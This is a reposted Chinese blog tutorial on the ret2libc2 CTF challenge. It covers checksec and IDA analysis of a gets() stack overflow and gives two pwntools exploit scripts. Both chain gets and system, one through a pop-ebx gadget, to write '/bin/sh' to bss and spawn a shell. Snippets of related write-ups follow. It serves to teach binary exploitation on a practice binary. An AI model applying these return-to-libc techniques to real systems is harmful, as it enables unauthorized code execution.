栈溢出入门0x06 ret2libc2

转载 已于 2024-10-03 19:22:23 修改 · 166 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://blog.csdn.net/ATFWUS/article/details/104565483
文章标签:

#linux

于 2024-10-03 19:20:24 首次发布

前言:

本博客非原创博客, 内容大部分都来自参考文献链接。

ret2libc1中system函数是动态库里的函数,且已经在plt表中了;并且也有“/bin/sh”。这太过简单了,所以增加点难度——如果没有“/bin/sh”怎么办?还是得自己读入一个。

题目:ret2libc2

链接:https://pan.baidu.com/s/1Lncq6vrUNEJ7vLKvTQ_gsA
提取码:yywk

分析:

checksec:

        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)

IDA:

int __cdecl main(int argc, const char **argv, const char **envp)
    {
      char s; // [esp+1Ch] [ebp-64h]

      setvbuf(stdout, 0, 2, 0);
      setvbuf(_bss_start, 0, 1, 0);
      puts("Something surprise here, but I don't think it will work.");
      printf("What do you think ?");
      gets(&s);
      return 0;
    }

从IDA里查找可以发现system函数但是没有“/bin/sh”,所以需要自己读一个,进而需要找个缓冲区。

找到system的地址:

                                                                                图1

 sytem地址:0x08048490

没有找到bin/sh,所有我们可以自己制造一个。
先再bss段找一个变量:

                                                                                图2

 buf2的地址为:0x0804A080

我们需要调用gets函数,读取一个bin/sh放在buf2,然后找到gets函数,去plt表看:

                                                                                图3

gets地址为:0x08048460。

得到偏移量:

                                                                                图4

exp:

from pwn import*
r=process('./ret2libc2')
sys_adr=0x08048490
gets_adr=0x08048460
buf2_adr=0x0804A080

payload=flat([112*'A',gets_adr,sys_adr,buf2_adr,buf2_adr])

r.sendline(payload)
r.sendline('/bin/sh')
r.interactive()

需要再寻找一个pop(作用后面说):

    ROPgadget --binary ret2libc2 --only 'pop|ret'| grep 'ebx'
    0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
    0x0804843d : pop ebx ; ret
pop ebx地址为:0x0804843d 

##!/usr/bin/env python
from pwn import*

r=process('./ret2libc2')

sys_adr=0x08048490
gets_adr=0x08048460
buf2_adr=0x0804A080
pop_ebx=0x0804843D

payload=flat([112*'A',gets_adr,pop_ebx,buf2_adr,sys_adr,'AAAA',buf2_adr])
#payload=flat([112*'A',gets_adr,sys_adr,buf2_adr,buf2_adr])

r.sendline(payload)
r.sendline('/bin/sh')
r.interactive()

pop ebx在此处的作用就是将gets函数的参数给pop掉。程序运行时是这样的:程序溢出后先运行到gets函数,然后gets函数返回后正好是pop ebx,这时候就会把buf2的地址pop到ebx中,然后继续运行就到了system函数的位置。

总结:

由于没有/bin/sh字符串,所有我们需要自己制造一个出来,利用存在的gts函数,读取一个/bin/sh到bss段的buf2处,再在后面的调用中把buf2作为参数。
第一种方法,栈分步应该是这样的,从上到下(低地址到高地址):
    gets地址
    system地址(也是gets的返回地址)
    buf2(是gets的参数)
    buf2(是system的参数)
第二种方法:
    gets地址
    pop ebx ;ret地址
    buf2(gets的参数)
    system地址
    system的返回地址('AAAA')
    buf2(system的参数)
第一种方法很好理解。
第二种方法就是在调用gets函数后,把参数buf2给pop掉,这样返回地址就变成了system,就会返回到system。

参看文献:

看人家写的不错,基本上没修改

ROP-基础-ret2libc2_ret2libc2下载-CSDN博客

[NewStarCTF 公开赛赛道]ret2libc(BUUCTF)
Welcome To Myon'Blog !
05-20 883
本文描述了一个64位程序的栈溢出漏洞利用过程。程序开启了NX保护,且没有直接提供/bin/sh字符串和system函数。通过分析,作者采用了ret2libc攻击思路,利用puts函数泄露其真实地址,进而计算libc基址,获取system函数和/bin/sh字符串的地址。首先,通过构造第一个payload,利用pop_rdi和ret指令将puts函数的真实地址泄露出来,并返回到main函数。接着,构造第二个payload,将/bin/sh字符串地址传入rdi寄存器,调用system函数,最终成功获取shell
从零开始学逆向:理解ret2libc-2
weixin_44626085的博客
02-20 1382
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。这道题与例题1基本相似,只是程序中没有了/bin/sh字符串,我们需要通过gets函数手动写入/bin/sh字符串到一个可写可执行区域,通常在bss段,在ida找到一个地址
pwn学习——ret2libc2
MrTreebook的博客
11-28 1274
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
ret2libc2
m0_54262894的博客
10-30 383
ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 先检查保护 放入ida 发现gets函数 Shift+F12 (因为在比赛中不会给你提示有没有 /bin/sh ,所以还是需要自己找一下) 两个方法都没有发现/bin/sh...
基本ROP之ret2libc2
至臻求学,胸怀云月
02-14 3839
原理 ret2libc即控制函数执行libc中的函数,通常是返回至某个函数plt表处或者函数的具体位置(即函数对应的got表项的内容),一般情况下我们选择执行system("/bin/sh"),故而我们需要知道system函数的地址 过程 下载地址:url checksec IDA分析 gets函数 system函数 经计算gets字符串和ebp的偏移为108,这里不进行赘述 查找bin/s...
ret2libc类型题目思考-ret2libc2
qq_30528603的博客
06-03 506
解析一下这样的布局,因为是栈溢出,所以我们要在溢出点做手脚填充112个字节的a来覆盖到返回地址,如何计算的填充数据的大小在ret2libc1中有很详细的讲解,这里就不再赘述,接下来,我们需要想先调用gets函数来让把我们输入的字符放入buf2,那么我们就需要调用gets函数的同时,把buf2的地址当参数传给gets函数。那么又有人问,中间的pop ebx的作用又是什么呢,其实它的作用是为了堆栈平衡的,用来把用完的buf2给弹出堆栈,方便ret的时候能正确指向system函数。因此我们完整的利用链就完成了。
pwn入门系列-ret2libc2
小心信科理化声
12-10 3247
Ret2libc2 今天来做一下经典的retlibc系列的第二题 资源:ret2libc2 老样子先checksec [*] '/home/giantbranch/Desktop/pwn/ret2libc2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 可以看到
栈溢出入门0x07 ret2libc3&Hijack GOT
最新发布
砖家
10-04 1118
使用patchelf保证ret2libc3的实验结果一致性,先泄露函数地址后得到libc版本和加载基地址之后计算出system和/bin/sh的真实加载地址,从而getshell
栈溢出入门0x05 ret2libc1
砖家
10-03 1124
程序中自身就含有system函数和"/bin/sh"字符串程序中自身就有system函数,但是没有"/bin/sh"字符串程序中自身就没有system函数和"/bin/sh"字符串,但给出了libc.so文件程序中自身就没有system函数和"/bin/sh"字符串,并且没有给出libc.so文件一般需要用到ret2libc的时候就是无法注入shellcode了,也没有int 80可用,更没有后门函数了。
堆栈认知——栈溢出实例(ret2libc)_栈溢出举例
2301_76348171的博客
04-06 959
我们可在栈溢出的时候,再让其执行gets函数,给其输入一个“/bin/sh”就好啦,值得注意的是:我们输入的“/bin/sh”需要放到bss段中的一个地址上去,因为这个不会随着函数的栈被覆盖或回收等机制导致我们找不到“/bin/sh”的地址了。注意:在泄露的时候我们需要通过gets函数的got表地址加偏移来泄露got表中的system函数地址,具体含义可百度一下,这里不过过深的说明。到此时我们就到了gets函数的libc中的地址,那么接下来我们就要获取system函数在libc中的地址。
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 802
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc2pwn 入门
02-11
pwn 入门
好好说话之ret2libc2
hollk’s blog
06-22 1458
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc2 看C代码 #include <stdio.h> #include <stdlib.h> #include <time.h> char buf2[100]; void secure(void) { int secretcode, inpu...
PWN —— ret2libc2
qq_41696518的博客
07-03 362
ret2libc2
ret2libc 2
weixin_44864859的博客
05-19 379
ret2libc 2 该题目与retlibc1基本一致,只不过不再出现 /bin/sh 字符串,所以此次需要我们自己来读取字符串,所以我们需要两个 gadgets,第一个控制程序读取字符串,第二个控制程序执行 system("/bin/sh")。 这里我们和上一题构造system函数一样构造gets函数用于读入/bin/sh字符串,然后我们需要考虑读到什么地址? 一般来说在程序运行时bss段会分配很大一段空间,所以我们在此基础上随意制定一个地址就可以了。 p.sendline('a'*112 + p32(e
ctf wiki ret2libc2
weixin_55885866的博客
05-13 256
具体思路为 构造两段gadgets ,第一段用于将字符串”/bin/sh“ 存储到某个地址。再构造system取出。注:汇编语言需要和地址p32();需要先给某个地址输入”/bin/sh“
basic rop ret2libc2
archli的博客
08-09 364
题目地址:ret2libc2 看一下ctfwiki的wp,这个题目我也并不是很明白,我只能进行一部分猜测,应该是想让第一个sendline执行读取字符串的操作,居然有这种骚操作,属实搞不懂,这种只能先记住,别无它法。 还是先让get读到ret函数,然后执行get函数,里面有一个问题就是为啥,要执行pop ebx的操作,然后bss有个buf字符串,把他用上读,我读个屁啊,算了这题问大佬吧。等着修改...
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7479
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值